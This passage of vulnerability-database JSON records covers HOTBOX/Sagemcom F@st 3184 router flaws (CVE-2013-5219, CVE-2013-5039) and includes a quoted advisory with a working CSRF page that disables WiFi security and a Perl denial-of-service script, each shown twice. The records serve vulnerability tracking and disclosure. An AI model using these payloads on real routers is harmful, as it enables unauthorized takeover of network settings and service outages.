            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5219",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CVE-2013-5219",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2014-00019",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "VHN-65221",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5219",
                "trust": 1.0,
                "value": "LOW"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5219",
                "trust": 0.8,
                "value": "Low"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00019",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-564",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65221",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to  gain access to potentially  sensitive information, bypass certain security restrictions to perform  unauthorized  actions, steal cookie-based authentication credentials and  gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of      |\n|  HOT Cable communication company in israel.           |\n| The Appliance is manufactured by SAGEMCOM         |\n| and carries the model name F@st 3184.                     |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities                         |\n+--------------------+---------------------------------------------------------+\n| Release Date       | 2013/09/09                                    |\n| Researcher         | Oz Elisyan                                     |\n+--------------------+---------------------------------------------------------+\n| System Affected    | HOTBOX Router/Modem               |\n| Versions Affected  | 2.1.11 , possibly earlier                 |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |\n| CVE-2013-5039                                                         |\n| Vendor Patched | N/A                                                 |\n| Classification     | 0-day                                              |\n| Exploits | http://elisyan.com/hotboxDoS.pl,                  |\n| http://elisyan.com/hotboxCSRF.html                           |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n    \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n        \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n        \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n    \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-65221",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-5219",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "123901",
            "trust": 3.2
          },
          {
            "db": "BID",
            "id": "63550",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "29518",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "id": "VAR-201312-0375",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:26.868000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.hot.net.il/heb/Main/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.youtube.com/watch?v=cplt09zij48"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5219"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5219"
          },
          {
            "trust": 0.3,
            "url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2013/nov/17"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
          },
          {
            "trust": 0.1,
            "url": "http://$host/goform/login\";"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxcsrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://elisyan.com/hotboxdos.pl,"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "date": "2013-11-04T13:03:33",
            "db": "PACKETSTORM",
            "id": "123901"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "date": "2013-12-30T04:53:07.303000",
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00019"
          },
          {
            "date": "2013-12-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-65221"
          },
          {
            "date": "2013-09-09T00:00:00",
            "db": "BID",
            "id": "63550"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          },
          {
            "date": "2013-12-31T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-5219"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "specific network environment",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "HOT HOTBOX Router Directory traversal vulnerability in Japanese software",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005735"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-564"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201312-0133

    Vulnerability from variot - Updated: 2025-04-11 22:48

    Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter. HOT HOTBOX router is a router device. Such as changing the WIFI security field. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+

    Vulnerabilities List -

    Default WPS Pin

    Authentication based on IP Address

    DoS via crafted POST

    Path/Directory Traversal

    Script injection via DHCP request

    No CSRF Token

    Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

    CSRF EXPLOIT:

    document.getElementById(1).submit();

    DENIAL OF SERVICE EXPLOIT:

    use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;

    Author: Oz Elisyan

    Date: 3 September 2013

    Affected Version: <= 2.1.11

    print "# HOTBOX DoS PoC #\n\n"

    unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }

    print "Sending Evil POST request...\n";

    my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);

    print "Done.";

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0133",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 3.0,
            "vendor": "hot",
            "version": "2.1.11"
          },
          {
            "model": "hotbox router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "hotbox router",
            "scope": null,
            "trust": 0.8,
            "vendor": "hot",
            "version": null
          },
          {
            "model": "f@st router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sagecom",
            "version": "31842.1.11"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:hot:hotbox_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oz Elisyan",
        "sources": [
          {
            "db": "BID",
            "id": "63550"
          },
          {
            "db": "PACKETSTORM",
            "id": "123901"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2013-5039",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 5.5,
                "id": "CVE-2013-5039",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 5.5,
                "id": "CNVD-2014-00017",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 5.5,
                "id": "VHN-65041",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-5039",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-5039",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00017",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201312-562",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-65041",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-65041"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005733"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201312-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-5039"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
